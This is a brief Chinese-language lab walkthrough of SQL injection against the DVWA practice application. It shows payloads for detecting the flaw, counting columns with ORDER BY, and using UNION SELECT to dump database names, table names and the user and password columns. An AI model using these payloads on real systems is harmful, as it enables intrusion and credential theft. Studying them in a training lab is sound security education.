代码审计:SELECT first_name, last_name FROM users WHERE user_id = '$id'
一、判断sql注入漏洞:
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'
输入1' and 1=1#
输入1' and 1=2# 没有反应
二、利用sql注入漏洞:
1.判断列数:
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#'
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#'
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#'
发现查到3时报错了,说明只有两列
2.联合查询
先查询用户和数据库:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select user(),database()#'
输入:1' union select user(),database()#
3.联合查询表:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema = 'dvwa' #'
4.联合查询信息:
SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#'